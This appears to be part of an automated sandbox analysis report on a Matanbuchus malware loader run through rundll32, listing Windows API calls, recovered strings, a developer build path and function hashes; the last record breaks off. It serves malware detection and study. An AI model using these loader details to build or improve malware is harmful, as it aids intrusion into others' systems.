                  • lstrlenW.KERNEL32(?,?,?,00000064,00000000,?,?,000048C0,00000000), ref: 7EDFC9B8
                  • GetCurrentProcessorNumber.KERNEL32(?,?,FFFFFF7B,000000FF), ref: 7EDFCD04
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentNumberProcessorlstrlen
                  • String ID: Component%lsdidnot$DD?ljh$]$6a
                  • API String ID: 3648197270-3207359874
                  • Opcode ID: 55be2bf3b886aa4715fd300cf9c7c80ae71d0d61609f170af23f780e498ae7f9
                  • Instruction ID: 2a35863e419afa6b712b17675da579ddccad48215de5503a3f4d58138f79593c
                  • Opcode Fuzzy Hash: 55be2bf3b886aa4715fd300cf9c7c80ae71d0d61609f170af23f780e498ae7f9
                  • Instruction Fuzzy Hash: F5B179B9D0422CCBCB15CF6AC8907ADBBB6BF48300F21899AD419F7255D7345A81CF59
                  APIs
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF18CF
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF18E9
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF1903
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF191D
                  Strings
                  • false, xrefs: 7EDF193E
                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EDF1939
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: std::bad_exception::bad_exception
                  • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                  • API String ID: 2160870905-4036550669
                  • Opcode ID: 66e872a4ec436c567d53bebfdf343cae4d7b2df80112666962638f0ab5b5f5a6
                  • Instruction ID: cf6cfad1f3095ee99ac9b75353505d2242f737ec91000c6ce54ecdfcb90ea072
                  • Opcode Fuzzy Hash: 66e872a4ec436c567d53bebfdf343cae4d7b2df80112666962638f0ab5b5f5a6
                  • Instruction Fuzzy Hash: A0219F79A05208EBCB08DFA4CC80DEEB775AF85300F648E5CE9562B241DF35AE05CB60
                  APIs
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF17AF
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF17C9
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF17E3
                  • std::bad_exception::bad_exception.LIBCMTD ref: 7EDF17FD
                  Strings
                  • false, xrefs: 7EDF181E
                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EDF1819
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: std::bad_exception::bad_exception
                  • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                  • API String ID: 2160870905-4036550669
                  • Opcode ID: c4a1c630a311f89560c09351dbf864745376210e93e07961ca0d87cb1bccd56b
                  • Instruction ID: dbb33fc296e23a359c749b0c6bf8e1c6911cc7c1db832d627292d8555620c171
                  • Opcode Fuzzy Hash: c4a1c630a311f89560c09351dbf864745376210e93e07961ca0d87cb1bccd56b
                  • Instruction Fuzzy Hash: B321A079E05248EBCB04DFA4CD80DDEB375AB85300F648E98E9523B241DA31AE05CB60
                  APIs
                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,7ED94A08,?,7BA98982,?,7EE165A9,7ED94A08,7EE02C35,7ED94A08,00000000), ref: 7EE1655D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLibrary
                  • String ID: api-ms-$ext-ms-
                  • API String ID: 3664257935-537541572
                  • Opcode ID: 40a1fd78987e16efa71c0f5b03c98dc6f39eede52a02dc70be57b90ab87c3680
                  • Instruction ID: 6c594eea3bdb23cec63561fade6d5c7f5d331daf56dfdefe5fe8378a5e2665a1
                  • Opcode Fuzzy Hash: 40a1fd78987e16efa71c0f5b03c98dc6f39eede52a02dc70be57b90ab87c3680
                  • Instruction Fuzzy Hash: 2521277FA21A13ABC7129AA6DC40B4A777CEB45368F210D10FD17A72C9D730EA44C6E0
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :FailedAddIndicator$?$Namespace$()`$2
                  • API String ID: 0-3918342373
                  • Opcode ID: 48e0f0fd35351cd2c5628bf0b5bac354b196d590a5ca28903cd0018ce99d935b
                  • Instruction ID: de3477546bf6ef1582bfd1675890dc8ab5f98f6fe153ad98e03546c87101a8dc
                  • Opcode Fuzzy Hash: 48e0f0fd35351cd2c5628bf0b5bac354b196d590a5ca28903cd0018ce99d935b
                  • Instruction Fuzzy Hash: 133216B9D04268CFDB14CFAAC984BADBBB5BB48300F20899AD449F7365D7745A80CF51
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7EE02965
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7EE029D0
                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EE029ED
                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7EE02A2C
                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EE02A8B
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7EE02AAE
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiStringWide
                  • String ID:
                  • API String ID: 2829165498-0
                  • Opcode ID: 57dda12634d9ae231a8cc3780d5e0629d12226fcffb3b34af27d367634dbfc4f
                  • Instruction ID: 6c0bbc3886190c269f3ed18d69396b9a3dc2738d7ac992cdc186fd0f06ae753a
                  • Opcode Fuzzy Hash: 57dda12634d9ae231a8cc3780d5e0629d12226fcffb3b34af27d367634dbfc4f
                  • Instruction Fuzzy Hash: 7351907A51020AAFDF218F55CD44FAA3BF9EF48754F304C25FD0696156DB358950CB60
                  APIs
                  • GetFocus.USER32 ref: 7EDC1AB1
                  • IsWindow.USER32(00000000), ref: 7EDC1AC4
                  • IsWindowEnabled.USER32(00000000), ref: 7EDC1AD4
                  • IsWindowUnicode.USER32(00000000), ref: 7EDC1AE4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$EnabledFocusUnicode
                  • String ID: DD?ljh
                  • API String ID: 2483921117-3179718564
                  • Opcode ID: f18918e34e7aedda69335d81d849227df53a749b90246af4ee03079ee0a43b49
                  • Instruction ID: 8b360521c877660c38eebd5abc6c43aa2b68c658f6400a6ef36cb414607fd05e
                  • Opcode Fuzzy Hash: f18918e34e7aedda69335d81d849227df53a749b90246af4ee03079ee0a43b49
                  • Instruction Fuzzy Hash: 37E1BF79904368CFDB14CFAAC9907AEBBF9BF49300F248859E485E7266D7349941CF12
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: BaseDialogUnits
                  • String ID: DD?ljh$L$\
                  • API String ID: 315647612-1501845851
                  • Opcode ID: 9b516533cf91908c32bc22e7e701d1dd2d3999ffb0cb3385d406fb1539ca9f9b
                  • Instruction ID: 19420e92bc48b42f202c62b2a478a1765d8fcf93ee4525069cee0ff7d6542ed5
                  • Opcode Fuzzy Hash: 9b516533cf91908c32bc22e7e701d1dd2d3999ffb0cb3385d406fb1539ca9f9b
                  • Instruction Fuzzy Hash: 4BB1927A904368CFCB15CF6EC8907EEBBBABB49300F148899E444E7266D7349A41CF51
                  APIs
                  • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7EE116D5
                  • GetFileType.KERNEL32(00000000), ref: 7EE116E7
                  • swprintf.LIBCMT ref: 7EE11708
                  • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 7EE11745
                  Strings
                  • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7EE116FD
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ConsoleFileHandleTypeWriteswprintf
                  • String ID: Assertion failed: %Ts, file %Ts, line %d
                  • API String ID: 2943507729-1719349581
                  • Opcode ID: 993fb454d7d1eb8f2f73df9718e8251dc5206fc473fa633fd16ca01bbe5c9991
                  • Instruction ID: 271387ef8253efb1e760a27c56ae63c21f9a407deca491c0a921a1cee271e457
                  • Opcode Fuzzy Hash: 993fb454d7d1eb8f2f73df9718e8251dc5206fc473fa633fd16ca01bbe5c9991
                  • Instruction Fuzzy Hash: 71113D7E9001196BCB109F29CD4CEDF73BDDF45214F614D58FA1693285DB309985CB54
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 7EDA58B7
                  • int.LIBCPMTD ref: 7EDA58D0
                    • Part of subcall function 7EDAA980: std::_Lockit::_Lockit.LIBCPMT ref: 7EDAA996
                    • Part of subcall function 7EDAA980: std::_Lockit::~_Lockit.LIBCPMT ref: 7EDAA9C0
                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7EDA5917
                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7EDA59AB
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                  • String ID:
                  • API String ID: 3053331623-0
                  • Opcode ID: 1762a6084185385d0dc0f9633455697739e1d616f9454cffa85013616b9f8471
                  • Instruction ID: 6d760e1e7f7bdc4127ac2857d00935887f1b826f130bdf1a92d20ca19402fad4
                  • Opcode Fuzzy Hash: 1762a6084185385d0dc0f9633455697739e1d616f9454cffa85013616b9f8471
                  • Instruction Fuzzy Hash: F341C6B8D04609DFCB04CF98D990AEEBBB5BF48310F204659E915B7390DB34AA41CFA1
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 7EDA5637
                  • int.LIBCPMTD ref: 7EDA5650
                    • Part of subcall function 7EDAA980: std::_Lockit::_Lockit.LIBCPMT ref: 7EDAA996
                    • Part of subcall function 7EDAA980: std::_Lockit::~_Lockit.LIBCPMT ref: 7EDAA9C0
                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7EDA5697
                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7EDA572B
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                  • String ID:
                  • API String ID: 3053331623-0
                  • Opcode ID: e7b24b664a2a3b6ce1c51913c39b53dfa7209518a8478d195776bf3144f6d393
                  • Instruction ID: df9f2fa5ab65057501ac05dc594320281043e457644043c919d8094715c66b47
                  • Opcode Fuzzy Hash: e7b24b664a2a3b6ce1c51913c39b53dfa7209518a8478d195776bf3144f6d393
                  • Instruction Fuzzy Hash: CC41B6B8D04609DFCB04CF98D990AEEBBB5BF48310F208659D915B7390DB34AA41CFA1
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 7EDA5777
                  • int.LIBCPMTD ref: 7EDA5790
                    • Part of subcall function 7EDAA980: std::_Lockit::_Lockit.LIBCPMT ref: 7EDAA996
                    • Part of subcall function 7EDAA980: std::_Lockit::~_Lockit.LIBCPMT ref: 7EDAA9C0
                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7EDA57D7
                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7EDA586B
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                  • String ID:
                  • API String ID: 3053331623-0
                  • Opcode ID: ce7db75af44949933ea49a0111ba08ba849eb074269343687179619db517f880
                  • Instruction ID: 446039624b5dccb7e38b5d7bd3204439a2c9ce45e142e8b8cdbfe51e2615ce40
                  • Opcode Fuzzy Hash: ce7db75af44949933ea49a0111ba08ba849eb074269343687179619db517f880
                  • Instruction Fuzzy Hash: E341C7B8D04609DFCB04CF98D990AEEBBB5BF48310F204659D916B7390DB356A45CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: DD?ljh$Errorgettinghashof
                  • API String ID: 0-1880373806
                  • Opcode ID: c84127e74d8a87fd129d91e3c141d5b2d05098cc371a902cf8299ea408f341f7
                  • Instruction ID: aa00a3be71f11252a130e8faa7ebc68872c24afce32fe68d9f4f3d3340c80997
                  • Opcode Fuzzy Hash: c84127e74d8a87fd129d91e3c141d5b2d05098cc371a902cf8299ea408f341f7
                  • Instruction Fuzzy Hash: 1BE1AE79C0579CCADB14CFAAC4507ADBBB9BF59300F20899AE448E7366E7344A40CF12
                  APIs
                  • GetCurrentProcessId.KERNEL32(00000000,00000000,9A514AF6,00000000,?,?,FFFFFF7B,000000FF), ref: 7EDFD57F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcess
                  • String ID: :FailedAddIndicator$DD?ljh$Lnotadirectory
                  • API String ID: 2050909247-3254566122
                  • Opcode ID: 264259878dba75fcf34bb4b9a5d4ee857d364893417f6d173e8655618cf6b640
                  • Instruction ID: 2f4efbc2333824d3d4a65309a6ecc8dc584931bb0efc884d695d5f7f5afea8d9
                  • Opcode Fuzzy Hash: 264259878dba75fcf34bb4b9a5d4ee857d364893417f6d173e8655618cf6b640
                  • Instruction Fuzzy Hash: C6B1397990876CCAC705CF66C8A07BD7BB5BF89301F24889AE055F726AD7344A81CF11
                  APIs
                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,00000000), ref: 7EE01835
                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 7EE018DF
                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 7EE018E9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: ?
                  • API String ID: 2922976086-1684325040
                  • Opcode ID: b684511446bd20333a0a683e829c0c386b7fd144bc024246568f2fb9a1010f6c
                  • Instruction ID: 87bbd773ba6aa86714c905b3155b40a9ed262a02d96d5e87749180fdb2da77e2
                  • Opcode Fuzzy Hash: b684511446bd20333a0a683e829c0c386b7fd144bc024246568f2fb9a1010f6c
                  • Instruction Fuzzy Hash: B421A375D04259BBDF258A96CC08EAF7BBDFFC5700F6008A9F915A9060F7318B14CA60
                  APIs
                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,7EE073B3,?,?,00000000,?,?,?,7EE074DD,00000002,FlsGetValue,7EE2CECC,FlsGetValue), ref: 7EE0740F
                  • GetLastError.KERNEL32(?,7EE073B3,?,?,00000000,?,?,?,7EE074DD,00000002,FlsGetValue,7EE2CECC,FlsGetValue,?,?,7EE062D4), ref: 7EE07419
                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 7EE07441
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID: api-ms-
                  • API String ID: 3177248105-2084034818
                  • Opcode ID: 553840946f4021cde4d6f49ee82e39a5b13d6b52f65fb00f4465cdd35fc71b3f
                  • Instruction ID: 522b72a3d31a2ecf46c86a69057ad7a1277edfe3d5a2e27b6d917816472d6fef
                  • Opcode Fuzzy Hash: 553840946f4021cde4d6f49ee82e39a5b13d6b52f65fb00f4465cdd35fc71b3f
                  • Instruction Fuzzy Hash: 26E04F796A0609BBEB112E62DD0AF693F7EFB00B55F305C30F90EA80D5D762E490E585
                  APIs
                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7EE01B57,?,?,?,7EE013AC,?,0000000F,?,00000000,00000208), ref: 7EE01D86
                  • GetProcAddress.KERNEL32(00000000), ref: 7EE01D8D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: RtlRandomEx$ntdll.dll
                  • API String ID: 1646373207-4284430886
                  • Opcode ID: 5685824d6b75b87550c214514e73faf288f2f355b84a5b4353f29a6cf5618f0a
                  • Instruction ID: 228d2e10f0e3a9e32548840206cb643e231e4b776c605ce1707daef04f03934f
                  • Opcode Fuzzy Hash: 5685824d6b75b87550c214514e73faf288f2f355b84a5b4353f29a6cf5618f0a
                  • Instruction Fuzzy Hash: DAD0C77A554B4C6FD7006FE6DC04E553BBDBF086063100924FD4ACE615EB319500D694
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 7EDE70FD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen
                  • String ID: :FailedAddIndicator$?$Namespace
                  • API String ID: 1659193697-4123740680
                  • Opcode ID: 4d7615a5871d88736fd61ea3e2e80f1444a17035449f5cc661904f9f99f569f8
                  • Instruction ID: 3b3dd8c9626bb9b92253b6612e8a8c1857f1782360474f01206bd24bcf849335
                  • Opcode Fuzzy Hash: 4d7615a5871d88736fd61ea3e2e80f1444a17035449f5cc661904f9f99f569f8
                  • Instruction Fuzzy Hash: 38D15ABAD04218CFDB15CFAAC984BADBBB5FB48300F20899AE459F7255D7305A81CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :FailedAddIndicator$?$Namespace
                  • API String ID: 0-4123740680
                  • Opcode ID: 64b080ab97aecbd622d50ebf0092e5df2fbf2c2fd707b5b3a0f318aff9cdb308
                  • Instruction ID: 05817b68e6bc3f9e0a28ab435c12f564c79786a0c6d589a96e21004f55a65fee
                  • Opcode Fuzzy Hash: 64b080ab97aecbd622d50ebf0092e5df2fbf2c2fd707b5b3a0f318aff9cdb308
                  • Instruction Fuzzy Hash: 4BA11979D04218CFDB14CFAAC984BADBBB5FB48310F20899AE449B7755D7706A80CF51
                  APIs
                  • GetFocus.USER32 ref: 7EDC1AB1
                  • IsWindow.USER32(00000000), ref: 7EDC1AC4
                  • IsWindowEnabled.USER32(00000000), ref: 7EDC1AD4
                  • IsWindowUnicode.USER32(00000000), ref: 7EDC1AE4
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$EnabledFocusUnicode
                  • String ID:
                  • API String ID: 2483921117-0
                  • Opcode ID: 61c84e37185da2faa25c49869f24f3dd3c8d8d486dd81514a69bde30386d802e
                  • Instruction ID: 24dcaf47173671171bc215cd04da6a32400f5f2eeeb35181da6e66fc9c00a397
                  • Opcode Fuzzy Hash: 61c84e37185da2faa25c49869f24f3dd3c8d8d486dd81514a69bde30386d802e
                  • Instruction Fuzzy Hash: 1941D3399047688FDB24CF6AC8543BEBBB9BF89341F208499E445E3266D7348981CF01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv
                  • String ID: +$-
                  • API String ID: 3732870572-2137968064
                  • Opcode ID: 2ee5eca974e5f36e9cd0f6eeaafdb26c03a2cad4593298ddd946a41978a409bc
                  • Instruction ID: f3c9ab260521ce7950e640cbc8925ff9f6eb41520a2a1c870bda58066791f61d
                  • Opcode Fuzzy Hash: 2ee5eca974e5f36e9cd0f6eeaafdb26c03a2cad4593298ddd946a41978a409bc
                  • Instruction Fuzzy Hash: B0A1E139D21249AECB05CE79C8507EE7BB1FF45228F248D59ECE6AB294D334D9018B60
                  APIs
                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,00000000,?,00000000,00000000,?,?,FFFFFF05,FFFFFFFF), ref: 7EDFE28F
                  • IsZoomed.USER32(?), ref: 7EDFE2AE
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodePageValidZoomed
                  • String ID: DD?ljh
                  • API String ID: 1499542914-3179718564
                  • Opcode ID: f8886d2464087ea1418fbf64c4e5daff67fb830847767488878d589c5da5043f
                  • Instruction ID: ce9b15724c47cc02919ce58ca5238cfbfa9d943cd3771bf04af8f4cf3b640eb8
                  • Opcode Fuzzy Hash: f8886d2464087ea1418fbf64c4e5daff67fb830847767488878d589c5da5043f
                  • Instruction Fuzzy Hash: FEC1ABB9D04268CEDB14CF6AC884BEDBBB5BF48310F248999E418E7395DB345A81CF51
                  APIs
                  • GetCurrentProcessorNumber.KERNEL32(?,?,FFFFFF7B,000000FF), ref: 7EDFCD04
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentNumberProcessor
                  • String ID: ]$6a
                  • API String ID: 2547382352-3538531091
                  • Opcode ID: 862fa05ff71d4454021b9204977888909f3a6e907cdf3128a5769c7a4d912e1a
                  • Instruction ID: 05db4c519abaedfe95218f9c31327b887fa33c0c9c589c1c8816fcb3aa5b70de
                  • Opcode Fuzzy Hash: 862fa05ff71d4454021b9204977888909f3a6e907cdf3128a5769c7a4d912e1a
                  • Instruction Fuzzy Hash: E9C17BB9D00228CBCB14CF6AC8907ADBBB6BF48300F20899AE559F7255D7345E81CF59
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,4DF77721,0009E568,00006CA5,?,?,?,00000099,00000000,?), ref: 7EDE3063
                  • GetCommandLineW.KERNEL32(?,4DF77721,0009E568,00006CA5,?,?,?,00000099,00000000,?), ref: 7EDE30DB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CommandLinelstrlen
                  • String ID: Errorgettinghashof
                  • API String ID: 3227309831-4227999271
                  • Opcode ID: 390e4967cabc634f0d4bf05ca77263baccf6d330b524651c68dc4c1bbd0eec4e
                  • Instruction ID: e4d57bcb7d665a2f15e9a1e9c09fc7385d58304d63ac6472caf20738aca0feb1
                  • Opcode Fuzzy Hash: 390e4967cabc634f0d4bf05ca77263baccf6d330b524651c68dc4c1bbd0eec4e
                  • Instruction Fuzzy Hash: 6851A17A905358CAC718CF6AC5507BDBBFABB99300F2048AAE844E7366D7344A40CF11
                  APIs
                  • GetWindowTextLengthA.USER32(?), ref: 7EDB9D93
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LengthTextWindow
                  • String ID: :FailedAddIndicator$DD?ljh
                  • API String ID: 298885082-2868022954
                  • Opcode ID: d223b73a97fd26a9475434f4e21d6a42af6d4320853a0efd430214157d4f4156
                  • Instruction ID: 3bfe7747fae4bdd3aef55145718f44a1ac407fd57544f590a8262f81a4214ce1
                  • Opcode Fuzzy Hash: d223b73a97fd26a9475434f4e21d6a42af6d4320853a0efd430214157d4f4156
                  • Instruction Fuzzy Hash: 8551617AD05758CFDB18CF6AC9917ADBBFABB49300F208999E049E3265D7344A41CF11
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 7EDA7A53
                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7EDA7B1F
                    • Part of subcall function 7EE022E2: _Yarn.LIBCPMT ref: 7EE02301
                    • Part of subcall function 7EE022E2: _Yarn.LIBCPMT ref: 7EE02325
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                  • String ID: bad locale name
                  • API String ID: 1908188788-1405518554
                  • Opcode ID: bfd71b04fe93778259563942c65146a05cb4c7c51bbdce1f7109292d837aec55
                  • Instruction ID: b16d50045d41e14649e8f020e619a959a9fbb31beb93977c462abcfa4e63365d
                  • Opcode Fuzzy Hash: bfd71b04fe93778259563942c65146a05cb4c7c51bbdce1f7109292d837aec55
